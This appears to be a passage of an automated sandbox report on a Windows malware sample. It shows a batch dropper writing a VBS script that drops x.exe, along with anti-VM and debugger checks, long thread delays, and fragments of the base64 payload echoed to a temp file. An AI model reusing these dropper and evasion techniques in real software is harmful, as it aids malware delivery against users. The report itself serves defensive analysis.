            Source: 5.2.x.exe.7ce0000.5.raw.unpack, qQHIUfkqHkckfCGc3EH.csHigh entropy of concatenated method names: 'IfCelZTqNn', 'EF1eXYpicv', 'o1teVl66aR', 'tb5eaSA5mN', 'xiBey8Z2AE', 'BmbeUkdS2b', 'xrterCZtBS', 'HQVepadR62', 'efQeRrED1n', 'uQJePUrBkv'
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, Gb17w0T0wA9mVSBeuJ.csHigh entropy of concatenated method names: 'nK69S00FJQ', 'HA09smh45Z', 'kAw9KN673M', 'JTC9FPJ1cI', 'wsp93aSqk0', 'ypjKTcas1x', 'Oa6KBhbPvm', 'o2IKDVkATH', 'EEuK0PuZlu', 'o28KcNmrTH'
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, G9296xsYpuxFhFvQZi.csHigh entropy of concatenated method names: 'Dispose', 'xF9vcg5fy0', 'HLmbOGZqfu', 'bLy22mggGL', 'GoZv1HgFYO', 'cOlvz0OWQ3', 'ProcessDialogKey', 'tNvbu6UAqb', 'NPabvbEQbD', 'c7sbbemMbC'
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, mFJ92nZUGIWZd0yGov.csHigh entropy of concatenated method names: 'ToString', 'bhZZhTRB5y', 'kRbZOxFp1N', 'YRRZ4FJ9eH', 'bVVZdjCWJi', 'J5QZ6WPrPx', 'OU3ZfI3h2X', 'SQ1ZioPxwX', 'BebZMxNJUO', 'UtKZqjyN9I'
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, Q3JIIfB5ewGdb036pH.csHigh entropy of concatenated method names: 'sXVFlGKfqH', 'U0vFXbEDOw', 'CERFV9FwVE', 'FvOFa9T1em', 'xuBFyDOwFJ', 'fgsFU5UyLE', 'QkkFr7ZfJg', 'QlRFpkerpQ', 'yTLFRkoWHG', 'D5oFPTMyfT'
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, qWodHXM6bcYeEUK7Kb.csHigh entropy of concatenated method names: 'VVbo0xbpLV', 'jAJo1SvYwX', 'mQfGuBuaBY', 'sofGvF5l6m', 'KhaohvA7mq', 'lI6oW8Zlc7', 'UqIoYRQFdq', 'Ftvo7qDLE9', 'ONdoQMkPLD', 'Hx6omPQyGn'
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, cOV6GdkH8mVWMDomBbq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vyGn7hed8x', 'KZ8nQQnu6W', 'OBonmeJoGy', 'xpWn8E3mPF', 'amFnTK6hee', 's5bnBwErnk', 'aLKnD3G2M6'
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, woDxRIpElIEKfjvhS7.csHigh entropy of concatenated method names: 'IoAKyt1duO', 'dGjKrykRLt', 'AesH4vVr4f', 'ofOHd3nBWT', 'zTKH6HyZgt', 'ogmHfrcHZQ', 'thPHiTOA9B', 'XfoHMW6J29', 'UEKHqVqy98', 'bTiHEiqrY8'
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, zYYKOJAWCGC8XTqj1s.csHigh entropy of concatenated method names: 'cQrLpKaZyZ', 'gETLR4A3OV', 'alJLAYQcmU', 'kcuLODbpgE', 'hYOLdocCFV', 'ToJL6a9LgE', 'Eo6LiFMOZd', 'Mn1LM4n6Se', 'jIdLEeoJ9U', 'vbWLhOUPsI'
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, iqslocnQKfRotlO4Ia.csHigh entropy of concatenated method names: 'R48G5q0bQl', 'Lc2GslGXeM', 'FNUGHfSC0V', 'IjEGKv7FnW', 'w7VG9VT2PN', 'vuXGFRZByo', 'kpEG344bIe', 'a9vGjpVV5X', 'FsdGg4ga8R', 'xebGNdJIKO'
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, tmUVgUD8XWmg4UU1HL.csHigh entropy of concatenated method names: 'UccGA6h6Ru', 'vCAGOqSRP8', 'lgMG4Kkf3v', 'vr5GdWll3A', 'aJFG7YErQM', 'vomG6j73O6', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, P1KjSS8EMJ4Zj3i9oP.csHigh entropy of concatenated method names: 'Oa4Vg2mKJ', 'MWXaWW78h', 'a9NUBI3pF', 'jONr6tJH9', 'lWBRQrnGy', 'sx9Py3sM6', 'tkHbyPs18qO6nIC2ym', 'M7u0NxyyYqNeL44JNC', 'y1NGpMwj9', 'q6lnyeVoM'
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, Ldm2CSOPWLn1JUAKg7.csHigh entropy of concatenated method names: 'PlDHa8T03d', 'ewiHU8bSpj', 'nE9HpBRxEP', 'Hp6HR1LUDI', 'eXfHII0fXS', 'NGsHZQRNCJ', 'LPmHonEoLr', 'nDuHGnlJtH', 'OarHejLPG7', 'BW4HnmDWZJ'
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, Iq9ZQy9BvVQNp1fKNT.csHigh entropy of concatenated method names: 'O4iJS6krbE', 'YWUJ5uN6BT', 'FXRJsSCvO0', 'S7eJH2gv5F', 'TMEJK3WmX3', 'liGJ9Nm0qh', 'wGDJFoecf7', 'eOKJ3foQxd', 'eOhJj25pC2', 'vxeJg9mVaQ'
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, D0p1NKPVj9ucY2Qm8F.csHigh entropy of concatenated method names: 'qaDvFICns7', 'JsEv3Ajh7c', 'lT1vgTYidi', 'cpmvNL6d6L', 'gSKvIE4I8P', 'lhevZ64vux', 'U2IfjrQUyiwX46rjll', 'u4TQBvUO9NdovsZNV3', 'UQhvvZwDQu', 'O1fvJxOkDH'
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, z6oiKCyaK2NEMrrIhH.csHigh entropy of concatenated method names: 'HVpev8UT4Z', 'fHoeJneEle', 'rLOeCNpPhj', 'wIde5ySMSb', 'Nb0esYOj60', 'EhDeKAjJ6R', 'bqme9Qx0Nd', 'yDeGD1ldIN', 'L0aG0MVP8y', 'UaeGctI9wl'
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, dMn7Q7mEsppOh0xjvJ.csHigh entropy of concatenated method names: 'IXMs7TDYo5', 'qmKsQ7w07K', 'mW8smme9x8', 'YHds8eIGAt', 'vpOsTISWTy', 'yxpsBMtpbS', 'NcmsDIcWTh', 'FUYs0FQJs6', 'vsqscKUklf', 'EXFs1gJjS7'
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, nJ8tJ5aNcG8so8TN18.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'FVbbcT7LGQ', 'uodb1FY2qp', 'I9sbztNVq5', 'onBJuvCHAp', 'GESJvvljer', 'wDgJbYm1Uv', 'B0lJJXrWtq', 'TRcRM3Zi8QX3NDOnAUb'

            Persistence and Installation Behavior

            barindex
            Command shell drops VBS files
            Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\x.vbsJump to behavior
            Source: C:\Windows\System32\cscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: x.exe PID: 6728, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 1150000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 4AC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 9500000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: A500000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: A730000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: B730000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: BB80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: CB80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: DB80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0144D1C0 rdtsc 7_2_0144D1C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeAPI coverage: 0.7 %
            Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 4764Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7064Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: FS001_ DT103024.batBinary or memory string: echo zERVMCInczNhUcTbd1EWG4MmMKlsuKW+nDHIbMxilXPhioqGJHY5ELg3eoVWNAzFT09MBX>>%tmp%\x
            Source: cscript.exe, 00000004.00000003.2177185637.0000024361542000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zERVMCInczNhUcTbd1EWG4MmMKlsuKW+nDHIbMxilXPhioqGJHY5ELg3eoVWNAzFT09MBX
            Source: cscript.exe, 00000004.00000003.2177185637.0000024361542000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HnUZ/Q9U+L9D2WnUp4cl6J2Nr1kzIR4KRWJXN+q8VdD4uwN0KZ3QezjqXt6ot4UuSVmCi/
            Source: FS001_ DT103024.batBinary or memory string: echo HnUZ/Q9U+L9D2WnUp4cl6J2Nr1kzIR4KRWJXN+q8VdD4uwN0KZ3QezjqXt6ot4UuSVmCi/>>%tmp%\x
            Source: FS001_ DT103024.batBinary or memory string: echo UsGcBo0v/3Ec+Q+9KtjbPyn//qJWs0P6gWx+/43yNtfUP+N/A74YsZMRwIpACQqEmUAESa>>%tmp%\x
            Source: cscript.exe, 00000004.00000003.2175918689.0000024361549000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.2177014467.0000024360ACF000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.2176716309.00000243608C2000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.2173426892.0000024360AC9000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.2174075666.0000024360BD8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.2174601298.0000024360DFC000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.2177185637.0000024361542000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.2176674872.0000024360401000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UsGcBo0v/3Ec+Q+9KtjbPyn//qJWs0P6gWx+/43yNtfUP+N/A74YsZMRwIpACQqEmUAESa
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0144D1C0 rdtsc 7_2_0144D1C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_004178A3 LdrLoadDll,7_2_004178A3
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01464144 mov eax, dword ptr fs:[00000030h]7_2_01464144
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01464144 mov eax, dword ptr fs:[00000030h]7_2_01464144
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01464144 mov ecx, dword ptr fs:[00000030h]7_2_01464144
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01464144 mov eax, dword ptr fs:[00000030h]7_2_01464144
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01464144 mov eax, dword ptr fs:[00000030h]7_2_01464144
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CB136 mov eax, dword ptr fs:[00000030h]7_2_013CB136
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CB136 mov eax, dword ptr fs:[00000030h]7_2_013CB136
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CB136 mov eax, dword ptr fs:[00000030h]7_2_013CB136
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CB136 mov eax, dword ptr fs:[00000030h]7_2_013CB136
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D1131 mov eax, dword ptr fs:[00000030h]7_2_013D1131
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D1131 mov eax, dword ptr fs:[00000030h]7_2_013D1131
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A5152 mov eax, dword ptr fs:[00000030h]7_2_014A5152
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01469179 mov eax, dword ptr fs:[00000030h]7_2_01469179
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF172 mov eax, dword ptr fs:[00000030h]7_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01490115 mov eax, dword ptr fs:[00000030h]7_2_01490115
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0147A118 mov ecx, dword ptr fs:[00000030h]7_2_0147A118
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0147A118 mov eax, dword ptr fs:[00000030h]7_2_0147A118
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0147A118 mov eax, dword ptr fs:[00000030h]7_2_0147A118
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0147A118 mov eax, dword ptr fs:[00000030h]7_2_0147A118
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01400124 mov eax, dword ptr fs:[00000030h]7_2_01400124
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D6154 mov eax, dword ptr fs:[00000030h]7_2_013D6154
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D6154 mov eax, dword ptr fs:[00000030h]7_2_013D6154
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CC156 mov eax, dword ptr fs:[00000030h]7_2_013CC156
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D7152 mov eax, dword ptr fs:[00000030h]7_2_013D7152
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C9148 mov eax, dword ptr fs:[00000030h]7_2_013C9148
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C9148 mov eax, dword ptr fs:[00000030h]7_2_013C9148
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C9148 mov eax, dword ptr fs:[00000030h]7_2_013C9148
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C9148 mov eax, dword ptr fs:[00000030h]7_2_013C9148
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A51CB mov eax, dword ptr fs:[00000030h]7_2_014A51CB
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014961C3 mov eax, dword ptr fs:[00000030h]7_2_014961C3
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014961C3 mov eax, dword ptr fs:[00000030h]7_2_014961C3
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013EB1B0 mov eax, dword ptr fs:[00000030h]7_2_013EB1B0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140D1D0 mov eax, dword ptr fs:[00000030h]7_2_0140D1D0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140D1D0 mov ecx, dword ptr fs:[00000030h]7_2_0140D1D0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0144E1D0 mov eax, dword ptr fs:[00000030h]7_2_0144E1D0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0144E1D0 mov eax, dword ptr fs:[00000030h]7_2_0144E1D0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0144E1D0 mov ecx, dword ptr fs:[00000030h]7_2_0144E1D0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0144E1D0 mov eax, dword ptr fs:[00000030h]7_2_0144E1D0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0144E1D0 mov eax, dword ptr fs:[00000030h]7_2_0144E1D0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CA197 mov eax, dword ptr fs:[00000030h]7_2_013CA197
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CA197 mov eax, dword ptr fs:[00000030h]7_2_013CA197
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CA197 mov eax, dword ptr fs:[00000030h]7_2_013CA197
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A61E5 mov eax, dword ptr fs:[00000030h]7_2_014A61E5
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014001F8 mov eax, dword ptr fs:[00000030h]7_2_014001F8
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014771F9 mov esi, dword ptr fs:[00000030h]7_2_014771F9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0148C188 mov eax, dword ptr fs:[00000030h]7_2_0148C188
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0148C188 mov eax, dword ptr fs:[00000030h]7_2_0148C188
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01410185 mov eax, dword ptr fs:[00000030h]7_2_01410185
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F51EF mov eax, dword ptr fs:[00000030h]7_2_013F51EF
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F51EF mov eax, dword ptr fs:[00000030h]7_2_013F51EF
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F51EF mov eax, dword ptr fs:[00000030h]7_2_013F51EF
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F51EF mov eax, dword ptr fs:[00000030h]7_2_013F51EF
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F51EF mov eax, dword ptr fs:[00000030h]7_2_013F51EF
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F51EF mov eax, dword ptr fs:[00000030h]7_2_013F51EF
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F51EF mov eax, dword ptr fs:[00000030h]7_2_013F51EF
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F51EF mov eax, dword ptr fs:[00000030h]7_2_013F51EF
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F51EF mov eax, dword ptr fs:[00000030h]7_2_013F51EF
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F51EF mov eax, dword ptr fs:[00000030h]7_2_013F51EF
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F51EF mov eax, dword ptr fs:[00000030h]7_2_013F51EF
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F51EF mov eax, dword ptr fs:[00000030h]7_2_013F51EF
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F51EF mov eax, dword ptr fs:[00000030h]7_2_013F51EF
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D51ED mov eax, dword ptr fs:[00000030h]7_2_013D51ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01427190 mov eax, dword ptr fs:[00000030h]7_2_01427190
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0145019F mov eax, dword ptr fs:[00000030h]7_2_0145019F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0145019F mov eax, dword ptr fs:[00000030h]7_2_0145019F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0145019F mov eax, dword ptr fs:[00000030h]7_2_0145019F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0145019F mov eax, dword ptr fs:[00000030h]7_2_0145019F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014811A4 mov eax, dword ptr fs:[00000030h]7_2_014811A4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014811A4 mov eax, dword ptr fs:[00000030h]7_2_014811A4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014811A4 mov eax, dword ptr fs:[00000030h]7_2_014811A4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014811A4 mov eax, dword ptr fs:[00000030h]7_2_014811A4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0147705E mov ebx, dword ptr fs:[00000030h]7_2_0147705E
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0147705E mov eax, dword ptr fs:[00000030h]7_2_0147705E
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CA020 mov eax, dword ptr fs:[00000030h]7_2_013CA020
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CC020 mov eax, dword ptr fs:[00000030h]7_2_013CC020
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013EE016 mov eax, dword ptr fs:[00000030h]7_2_013EE016
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013EE016 mov eax, dword ptr fs:[00000030h]7_2_013EE016
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013EE016 mov eax, dword ptr fs:[00000030h]7_2_013EE016
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013EE016 mov eax, dword ptr fs:[00000030h]7_2_013EE016
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A5060 mov eax, dword ptr fs:[00000030h]7_2_014A5060
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0145106E mov eax, dword ptr fs:[00000030h]7_2_0145106E
